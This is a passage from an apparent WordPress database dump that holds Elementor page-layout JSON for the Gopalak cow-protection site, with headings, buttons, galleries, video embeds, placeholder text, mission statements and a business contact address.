here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9420,1604,'_elementor_page_assets','a:0:{}'),(9423,1605,'_elementor_edit_mode','builder'),(9424,1605,'_elementor_template_type','wp-page'),(9425,1605,'_elementor_version','3.7.8'),(9426,1605,'_wp_page_template','elementor_canvas'),(9427,1605,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"backgroun